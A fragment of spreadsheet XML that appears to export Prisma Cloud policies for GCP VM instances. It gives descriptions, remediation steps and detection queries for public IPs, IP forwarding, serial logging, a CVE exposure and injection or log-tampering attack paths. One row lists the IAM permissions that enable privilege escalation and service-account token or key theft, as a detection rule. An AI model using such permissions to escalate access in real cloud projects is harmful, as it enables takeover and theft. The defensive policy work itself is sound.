ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CIS v1.2.0 (GCP), PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2829" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2829" s="2" t="inlineStr"/>
      <c r="D2829" t="inlineStr"/>
      <c r="E2829" t="inlineStr"/>
      <c r="F2829" t="inlineStr"/>
      <c r="G2829" t="b">
        <v>1</v>
      </c>
      <c r="H28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29" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2829" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2829" t="inlineStr">
        <is>
          <t>GCP VM instance with the external IP address</t>
        </is>
      </c>
      <c r="L2829" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2829" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2829" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2829" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2829" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2829" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2829" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2829" t="inlineStr"/>
      <c r="T2829" t="b">
        <v>0</v>
      </c>
      <c r="U2829" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2829" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2829" t="inlineStr">
        <is>
          <t>This policy identifies the VM instances with the external IP address associated. To reduce your attack surface, VM instances should not have public/external IP addresses. Instead, instances should be configured behind load balancers, to minimize the instance's exposure to the internet.
NOTE: This policy will not report instances created by GKE because some of them have external IP addresses and cannot be changed by editing the instance settings. Instances created by GKE should be excluded. These instances have names that start with 'gke-' and contains 'default-pool'.</t>
        </is>
      </c>
      <c r="X2829" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate VM instances page
3. Click on the reported VM instance
4. click on 'EDIT'
5. In the Network interfaces section, For each network interface ensure that 'External IP' is set to 'None'.
6. Click on 'Done'
7. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-2</t>
        </is>
      </c>
      <c r="Y2829" t="inlineStr"/>
      <c r="Z2829" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instances-list' AND json.rule = status equals RUNNING and networkInterfaces[*].accessConfigs exists and (name does not start with gke- and name does not contain default-pool)
{"category":"Public","resourceTypes":["google_compute_instance"]}</t>
        </is>
      </c>
      <c r="AA2829" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2829" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2829" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-548-CKV_GCP_40</t>
        </is>
      </c>
      <c r="AD2829" t="b">
        <v>1</v>
      </c>
      <c r="AE2829" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2829" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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29" t="inlineStr">
        <is>
          <t>fb8d5eca-45b1-4a6a-855b-b517ab10d71d</t>
        </is>
      </c>
      <c r="AI2829" t="inlineStr">
        <is>
          <t>bfd3c912-521f-4280-ab5c-4a49d67f3df7</t>
        </is>
      </c>
      <c r="AJ2829" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2829" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2830">
      <c r="A2830" t="inlineStr"/>
      <c r="B2830" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2830" s="2" t="inlineStr"/>
      <c r="D2830" t="inlineStr"/>
      <c r="E2830" t="inlineStr"/>
      <c r="F2830" t="inlineStr"/>
      <c r="G2830" t="b">
        <v>1</v>
      </c>
      <c r="H28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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2830" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2830" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable GCP VM instance [Java Spring Framework, CVE-2021-22118]</t>
        </is>
      </c>
      <c r="L2830" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2830" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2830" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2830" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2830" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2830" t="inlineStr"/>
      <c r="R2830" t="inlineStr"/>
      <c r="S2830" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2830" t="b">
        <v>0</v>
      </c>
      <c r="U2830" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2830" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2830" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable privilege escalation vulnerability [Java Spring Framework, CVE-2021-22118].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Java [CVE-2021-22118] vulnerability and public exposure reported for the GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2830"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CVE-2021-22118
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-22118</t>
        </is>
      </c>
      <c r="Y2830" t="inlineStr"/>
      <c r="Z2830" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-22118'))</t>
        </is>
      </c>
      <c r="AA2830" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2830" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:59</t>
        </is>
      </c>
      <c r="AC2830" t="inlineStr"/>
      <c r="AD2830" t="b">
        <v>1</v>
      </c>
      <c r="AE2830" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2830" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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0" t="inlineStr">
        <is>
          <t>28a9e38f-97d2-489e-ae77-8b061f00553e</t>
        </is>
      </c>
      <c r="AI2830" t="inlineStr">
        <is>
          <t>89f801aa-f5dd-4542-a9ce-5799a00174bf</t>
        </is>
      </c>
      <c r="AJ2830" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2830" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2831">
      <c r="A2831" t="inlineStr">
        <is>
          <t>ITSG-33, NYDFS 23 CRR-NY 500.0, GDPR, CIS Controls v8.1, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, NIST 800-53 Rev 5, TX-RAMP Level 1, TX-RAMP Level 1, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, ITSG-33, HIPAA, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA, TX-RAMP Level 2, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2831" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2831" s="2" t="inlineStr"/>
      <c r="D2831" t="inlineStr"/>
      <c r="E2831" t="inlineStr"/>
      <c r="F2831" t="inlineStr"/>
      <c r="G2831" t="b">
        <v>1</v>
      </c>
      <c r="H28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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2831" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2831" t="inlineStr">
        <is>
          <t>GCP VM instance serial port output logging is enabled</t>
        </is>
      </c>
      <c r="L2831" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2831" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2831" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2831" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2831" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2831" t="inlineStr">
        <is>
          <t>Technological Controls</t>
        </is>
      </c>
      <c r="R2831" t="inlineStr">
        <is>
          <t>A8.12</t>
        </is>
      </c>
      <c r="S2831" t="inlineStr"/>
      <c r="T2831" t="b">
        <v>0</v>
      </c>
      <c r="U2831" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2831" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2831" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that have serial port output logging enabled.
The serial console feature in the VM instance does not support IP-based access restrictions such as IP allowlists. If you enable the interactive serial console on an instance, clients can attempt to connect to that instance from any IP address. When the serial port output logging feature is enabled, the serial port output is retained even after an instance is stopped or deleted.
It is recommended to disable serial port access and serial port output logging for all VM instances to avoid leakage of potentially sensitive data.</t>
        </is>
      </c>
      <c r="X2831" t="inlineStr">
        <is>
          <t>To disable serial port output logging on existing GCP VM instance, follow the below URL:
https://cloud.google.com/compute/docs/troubleshooting/viewing-serial-port-output#enable-stackdriver</t>
        </is>
      </c>
      <c r="Y2831" t="inlineStr"/>
      <c r="Z2831" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instances-list' AND json.rule = (status equals RUNNING and name does not start with "gke-") and metadata.items[?any(key contains "serial-port-logging-enable" and value equals "true")] exists</t>
        </is>
      </c>
      <c r="AA2831" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2831" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2831" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-1116</t>
        </is>
      </c>
      <c r="AD2831" t="b">
        <v>1</v>
      </c>
      <c r="AE2831" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2831" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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1" t="inlineStr">
        <is>
          <t>46650641-646e-44a2-beb4-cc97e9aede8e</t>
        </is>
      </c>
      <c r="AI2831" t="inlineStr">
        <is>
          <t>9db7fc8b-6773-408c-9325-782b7f67e682</t>
        </is>
      </c>
      <c r="AJ2831" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2831" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2832">
      <c r="A2832" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, NIST CSF, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v1.0.0 (GCP), ISO/IEC 27002:2013, FFIEC, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, PCI DSS v3.2.1, CIS Controls v7.1, CIS v3.0.0 (GCP) Level 1, CIS v1.3.0 (GCP), RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, ISO/IEC 27017:2015, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS v1.1.0 (GCP), CSA CCM v4.0.12, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v.4.0.6, NIST CSF, CSA CCM v.4.0.1, CIS Controls v8, FFIEC, APRA (CPS 234) Information Security, CIS Controls v8.1, CIS v1.2.0 (GCP), NIST CSF, CIS v2.0.0 (GCP) Level 1, CIS Controls v7.1, CIS Controls v8.1, ISO 27001:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v8, ISO/IEC 27001:2022, Rehan, ISO/IEC 27002:2013, CCPA 2018, Copy of CIS Controls v8, PIPEDA, ISO/IEC 27002:2013, Copy of CIS Controls v8, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), FFIEC, ISO 27002:2022, CSA CCM v.4.0.1, NIST SP 800-172, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2832" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2832" s="2" t="inlineStr"/>
      <c r="D2832" t="inlineStr"/>
      <c r="E2832" t="inlineStr"/>
      <c r="F2832" t="inlineStr"/>
      <c r="G2832" t="b">
        <v>1</v>
      </c>
      <c r="H28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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2832" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2832" t="inlineStr">
        <is>
          <t>GCP VM instances have IP Forwarding enabled</t>
        </is>
      </c>
      <c r="L2832" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2832" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2832" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2832" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2832" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2832" t="inlineStr">
        <is>
          <t>CIS Control 4</t>
        </is>
      </c>
      <c r="R2832" t="inlineStr">
        <is>
          <t>4.5</t>
        </is>
      </c>
      <c r="S2832" t="inlineStr"/>
      <c r="T2832" t="b">
        <v>0</v>
      </c>
      <c r="U2832" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2832" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2832" t="inlineStr">
        <is>
          <t>This policy identifies VM instances that have IP Forwarding enabled. IP Forwarding could open unintended and undesirable communication paths and allows VM instances to send and receive packets with the non-matching destination or source IPs. To enable the source and destination IP match check, disable IP Forwarding.</t>
        </is>
      </c>
      <c r="X2832" t="inlineStr">
        <is>
          <t>GCP VM instances IP forwarding feature cannot be updated. After an instance is created, the IP forwarding field becomes read-only. So to fix this alert, Create a new VM instance with IP forwarding disabled, migrate all required data from reported VM to newly created and delete the VM instance reported.
To create a new VM Instance with IP forwarding disabled:
1. Login to GCP Portal
2. Go to Computer Engine (Left Panel)
3. Go to VM instances
4. Click the CREATE INSTANCE button
5. Specify other instance parameters as you desire
6. Click Management, disk, networking, SSH keys
7. Click Networking
8. Click on the specific Network interfaces
9. Set IP forwarding to Off
10. Click on Done
11. Click on Create button
To Delete VM instance which has IP forwarding enabled:
1. Login to GCP Portal
2. Go to Computer Engine (Left Panel)
3. Go to VM instances
4. From the list of VMs, choose the reported VM
5. Click on Delete button 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-12
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-12</t>
        </is>
      </c>
      <c r="Y2832" t="inlineStr"/>
      <c r="Z2832" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instances-list' AND json.rule = status equals RUNNING and canIpForward is true and name does not start with "gke-"
{"category":"Networking","resourceTypes":["google_compute_instance"]}</t>
        </is>
      </c>
      <c r="AA2832" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2832" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2832" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-197-CKV_GCP_36</t>
        </is>
      </c>
      <c r="AD2832" t="b">
        <v>1</v>
      </c>
      <c r="AE2832" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2832" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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2" t="inlineStr">
        <is>
          <t>bb3cb1ba-55f8-4c14-b299-777d7be79697</t>
        </is>
      </c>
      <c r="AI2832" t="inlineStr">
        <is>
          <t>87220e37-d092-4d21-81e6-1bc21a2ef5ec</t>
        </is>
      </c>
      <c r="AJ2832" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2832" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2833">
      <c r="A2833" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2833" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2833" s="2" t="inlineStr"/>
      <c r="D2833" t="inlineStr"/>
      <c r="E2833" t="inlineStr"/>
      <c r="F2833" t="inlineStr"/>
      <c r="G2833" t="b">
        <v>1</v>
      </c>
      <c r="H28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33" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2833" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2833" t="inlineStr">
        <is>
          <t>GCP VM instance is assigned with public IP</t>
        </is>
      </c>
      <c r="L2833" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2833" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2833" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2833" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2833" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2833" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2833" t="inlineStr">
        <is>
          <t>NS-5</t>
        </is>
      </c>
      <c r="S2833" t="inlineStr"/>
      <c r="T2833" t="b">
        <v>0</v>
      </c>
      <c r="U2833" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2833" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2833" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are assigned a public IP.
Using a public IP with a GCP VM exposes it directly to the internet, increasing the risk of unauthorized access and attacks. This makes the VM vulnerable to threats such as brute force attempts, DDoS attacks, and other malicious activities. To mitigate these risks, it's safer to use private IPs and secure access methods like VPNs or load balancers.
It is recommended to avoid assigning public IPs to VM instances.</t>
        </is>
      </c>
      <c r="X2833" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Navigate to 'Compute Engine' and then 'VM instances'
3. Click on the reported VM instance
4. Stop the VM by clicking on the 'STOP' button. Click the 'STOP' button on the confirmation dialogue
5. Once the the VM has been stopped, click on the 'EDIT' button
6. Under 'Network interfaces', expand the network interface with the public external IP assigned
7. Select 'None' under 'External IPv4 address' as per your organizational needs
10. Click on 'Save'
11. Click on 'START/RESUME' from the top menu</t>
        </is>
      </c>
      <c r="Y2833" t="inlineStr"/>
      <c r="Z2833" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instances-list' AND json.rule = name does not start with "gke-" and (networkInterfaces[*].accessConfigs exists or networkInterfaces.ipv6AccessConfigs exists)</t>
        </is>
      </c>
      <c r="AA2833" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2833" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2833" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-1270</t>
        </is>
      </c>
      <c r="AD2833" t="b">
        <v>1</v>
      </c>
      <c r="AE2833" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2833" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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33" t="inlineStr">
        <is>
          <t>5273263a-16fc-4ee5-bd1b-06e8629fa5e0</t>
        </is>
      </c>
      <c r="AI2833" t="inlineStr">
        <is>
          <t>13bee07e-f035-4f20-b6ad-bfc1cdc4929a</t>
        </is>
      </c>
      <c r="AJ2833" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2833" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2834">
      <c r="A2834" t="inlineStr"/>
      <c r="B2834" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2834" s="2" t="inlineStr"/>
      <c r="D2834" t="inlineStr"/>
      <c r="E2834" t="inlineStr"/>
      <c r="F2834" t="inlineStr"/>
      <c r="G2834" t="b">
        <v>1</v>
      </c>
      <c r="H28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34" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2834" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2834" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to Code/Command injection payload detected on traffic targetting a vulnerable GCP VM instance with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2834" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2834" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2834" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2834" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2834" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2834" t="inlineStr"/>
      <c r="R2834" t="inlineStr"/>
      <c r="S2834" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2834" t="b">
        <v>0</v>
      </c>
      <c r="U2834" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2834" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2834" t="inlineStr">
        <is>
          <t>This policy identifies vulnerable GCP VM instances with Code/Command injection payload detected in the traffic and having permissions that could potentially lead to privilege escalation.
Code and command injection attacks exploit vulnerabilities in applications to inject and execute malicious code or commands. With elevated VM instance permissions and a successful code/command injection, attackers can steal data, compromise other systems, hijack resources, disrupt services, and establish persistent access within the GCP environment.
This policy checks for the following risky permissions:
'accessapproval.requests.approve','accessapproval.requests.dismiss','accessapproval.settings.delete','accessapproval.settings.update','accesscontextmanager.accessLevels.create','accesscontextmanager.accessLevels.delete','accesscontextmanager.accessLevels.replaceAll','accesscontextmanager.accessLevels.update','accesscontextmanager.accessPolicies.create','accesscontextmanager.accessPolicies.delete','accesscontextmanager.accessPolicies.setIamPolicy','accesscontextmanager.accessPolicies.update','accesscontextmanager.gcpUserAccessBindings.create','accesscontextmanager.gcpUserAccessBindings.delete','accesscontextmanager.gcpUserAccessBindings.update','accesscontextmanager.policies.create','accesscontextmanager.policies.delete','accesscontextmanager.policies.setIamPolicy','accesscontextmanager.policies.update','iam.roles.create','iam.roles.delete','iam.roles.undelete', 'iam.roles.update','iam.serviceAccounts.getAccessToken','iam.serviceAccountKeys.create','iam.serviceAccountKeys.delete','iam.serviceAccounts.create','iam.serviceAccounts.delete','iam.serviceAccounts.disable','iam.serviceAccounts.enable','iam.serviceAccounts.setIamPolicy','iam.serviceAccounts.undelete','iam.serviceAccounts.update','iam.serviceAccounts.implicitDelegation','iam.serviceAccounts.signBlob','iam.serviceAccounts.signJwt','iam.serviceAccounts.actAs','compute.backendServices.setIamPolicy','compute.disks.removeResourcePolicies','compute.disks.setIamPolicy','compute.firewallPolicies.setIamPolicy','compute.globalOperations.setIamPolicy','compute.images.setIamPolicy','compute.instanceTemplates.setIamPolicy','compute.instances.removeResourcePolicies','compute.instances.setIamPolicy','compute.instances.setServiceAccount','compute.machineImages.setIamPolicy','compute.maintenancePolicies.setIamPolicy','compute.snapshots.setIamPolicy'
Immediate attention is required to review the VM traffic, add the WAAS rule to prevent this activity, remediate critical and high vulnerabilities, and remove unwanted permissions assigned to the VM instance.</t>
        </is>
      </c>
      <c r="X2834"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34" t="inlineStr"/>
      <c r="Z2834" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'gcloud-compute-instances-list' ) and finding.name = ('GCP Compute Engine with IAM write access level' and ('Command Injection payload detected in HTTP traffic' or 'Code Injection payload detected in HTTP traffic')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2834" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2834" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:57</t>
        </is>
      </c>
      <c r="AC2834" t="inlineStr"/>
      <c r="AD2834" t="b">
        <v>1</v>
      </c>
      <c r="AE2834" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2834" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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34" t="inlineStr">
        <is>
          <t>8adb2c08-fdd7-4a15-b972-b6c7f1ec3c8f</t>
        </is>
      </c>
      <c r="AI2834" t="inlineStr">
        <is>
          <t>030ec33e-164e-458f-8097-9e077138467a</t>
        </is>
      </c>
      <c r="AJ2834" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2834" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2835">
      <c r="A2835" t="inlineStr"/>
      <c r="B2835" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2835" s="2" t="inlineStr"/>
      <c r="D2835" t="n">
        <v>1130</v>
      </c>
      <c r="E2835" t="n">
        <v>0</v>
      </c>
      <c r="F2835" t="n">
        <v>38</v>
      </c>
      <c r="G2835" t="b">
        <v>1</v>
      </c>
      <c r="H28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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2835" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2835" t="inlineStr">
        <is>
          <t>Cloud Log tampering risk due to a publicly exposed and vulnerable GCP VM instance with permissions to disrupt logging</t>
        </is>
      </c>
      <c r="L2835" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2835" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2835" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2835" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2835" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2835" t="inlineStr"/>
      <c r="R2835" t="inlineStr"/>
      <c r="S2835" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2835" t="b">
        <v>0</v>
      </c>
      <c r="U2835" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2835" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2835" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have permission to disrupt logging.
Publicly exposed and vulnerable GCP VM instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. GCP VM instances with permission to disrupt logging could further expand the surface of the attack and grant unauthorized access to delete or modify log metrics, sinks, and buckets containing project logs through which the attacker can erase his trail.
